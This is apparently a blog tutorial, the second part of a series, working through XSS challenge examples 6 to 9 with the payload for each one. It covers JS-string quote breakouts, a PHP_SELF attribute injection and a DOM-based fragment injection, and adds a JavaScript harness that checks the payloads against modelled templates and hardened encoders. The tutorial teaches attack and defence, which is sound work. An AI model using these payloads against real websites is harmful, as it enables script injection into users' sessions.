
Hello Cybrarians, once again. In this article, we continue our code analysis and exploitation of XSS from Part 1. If you haven't already read it, please do.

Let's begin...

Example 6:
As we see, the code is now completely different from the previous examples. In this one, our input lands inside JavaScript (a double-quoted string literal), so the payload doesn't need to introduce a script context of its own (no <script> tag, no javascript: URL, etc.). We also see no sanitization in place. The payload closes the string, runs our call, and opens a new string so the original closing quote still parses cleanly. Our payload will look like:
";prompt('ex6');"
Example 7:
So here, it starts getting a little bit more serious: we see HTML encoding in place, so we cannot use double quotes (") any more. The encoding in use leaves the single quote alone, though, and our value sits in a single-quoted JavaScript string, so we break out with that instead. Our payload will look like:
';alert('ex7');'
Example 8:
The HTML encoding is still in place, but the application also echoes the php_self variable (PHP's PHP_SELF, which reflects the request path) into the page without encoding it, so it trusts the user input and lets us execute our code there. We must first close the attribute and tag that are already open around it. Our payload will look like:
"><script>alert('ex8')</script>
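The three server-side contexts of examples 6, 7 and 8, as an added example in JavaScript (this is not code from the article or from the challenge pages). The templates, the htmlspecialchars models and the PHP_SELF value are constructed assumptions about what those pages render, and every function name here is mine. It renders each payload into its context, executes the two script contexts with alert/prompt replaced by a spy, shows why the double-quote payload of example 6 stops working once example 7's encoding is in place, and puts a hardened encoder beside each vulnerable template.

```javascript
// Added example, not code from the original article or the challenge pages.
// It models the three server-side contexts of examples 6, 7 and 8 with
// constructed templates (assumed shapes, not the real challenge source) and
// checks whether each payload actually breaks out, then does the same for a
// hardened encoder.

// PHP htmlspecialchars() with default flags: encodes & < > and the double
// quote, but leaves the single quote alone (the gap example 7 relies on).
function htmlspecialchars(s) {
  return s.replace(/&/g, '&amp;').replace(/</g, '&lt;')
          .replace(/>/g, '&gt;').replace(/"/g, '&quot;');
}

// htmlspecialchars($s, ENT_QUOTES): also encodes the single quote.
function htmlspecialcharsEntQuotes(s) {
  return htmlspecialchars(s).replace(/'/g, '&#039;');
}

// Encoder for a value placed inside a JavaScript string literal:
// JSON.stringify escapes quotes and backslashes, and escaping "<" stops a
// "</script>" inside the value from closing the enclosing script block.
function jsStringLiteral(s) {
  return JSON.stringify(s).replace(/</g, '\\u003c');
}

// Example 6: raw value inside a double-quoted JS string literal.
function renderEx6(value) {
  return `var name = "${value}";`;
}

// Example 7: HTML-encoded (default flags) value inside a single-quoted literal.
function renderEx7(value) {
  return `var name = '${htmlspecialchars(value)}';`;
}

// Hardened form for both JS-string contexts.
function renderJsFixed(value) {
  return `var name = ${jsStringLiteral(value)};`;
}

// Example 8: $_SERVER['PHP_SELF'] echoed into an attribute without encoding.
function renderEx8(phpSelf) {
  return `<form action="${phpSelf}">`;
}

// Hardened form: attribute value encoded with ENT_QUOTES semantics.
function renderEx8Fixed(phpSelf) {
  return `<form action="${htmlspecialcharsEntQuotes(phpSelf)}">`;
}

// Run a rendered script with alert/prompt replaced by a spy and report whether
// the injected call fired. 'syntax-error' means the payload broke the script
// instead of extending it, which is what happens when the wrong quote is used.
function injectedCallFires(script) {
  let fired = false;
  const spy = () => { fired = true; };
  try {
    new Function('alert', 'prompt', script)(spy, spy);
  } catch (e) {
    if (e instanceof SyntaxError) return 'syntax-error';
    throw e;
  }
  return fired;
}

// Toy attribute-context check (not a real HTML parser): split on double quotes
// so that even-numbered segments lie outside any quoted attribute value, and
// look for a <script tag that ended up there.
function attributeBreakout(html) {
  return html.split('"')
             .some((seg, i) => i % 2 === 0 && /<script/i.test(seg));
}

// The article's payloads, and a constructed PHP_SELF value for example 8
// (request path /index.php/ followed by the payload).
const PAYLOAD_EX6 = '";prompt(\'ex6\');"';
const PAYLOAD_EX7 = '\';alert(\'ex7\');\'';
const PAYLOAD_EX8 = '"><script>alert(\'ex8\')</script>';
const PHP_SELF_EX8 = '/index.php/' + PAYLOAD_EX8;

function main() {
  console.log('ex6 raw        :', injectedCallFires(renderEx6(PAYLOAD_EX6)));
  console.log('ex6 in ex7 ctx :', injectedCallFires(renderEx7(PAYLOAD_EX6)));
  console.log('ex7 raw        :', injectedCallFires(renderEx7(PAYLOAD_EX7)));
  console.log('ex6 hardened   :', injectedCallFires(renderJsFixed(PAYLOAD_EX6)));
  console.log('ex7 hardened   :', injectedCallFires(renderJsFixed(PAYLOAD_EX7)));
  console.log('ex8 raw        :', attributeBreakout(renderEx8(PHP_SELF_EX8)));
  console.log('ex8 hardened   :', attributeBreakout(renderEx8Fixed(PHP_SELF_EX8)));
}
main();
```

Run it with node. The example 6 payload dropped into the example 7 template comes back as a syntax error rather than an alert: once the double quote is encoded, the only way to close the literal is the quote the template actually used, which is why the article switches to single quotes there. The attribute check is a quote-parity toy, not a parser; the point it makes is that encoding the quote character for the context you are in (ENT_QUOTES for an attribute, a JSON-style literal with "<" escaped for a script) is what closes the hole, not stripping the word "script".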
Example 9:
Here, we have DOM-based XSS: on every request, the page's own script reads the URL fragment with hash.substring (everything after the #) and writes it into the document, so the payload never reaches the server at all. Our payload will look like:
#<script>alert('ex9')</script>
That's all for now. Use the form below for questions and comments.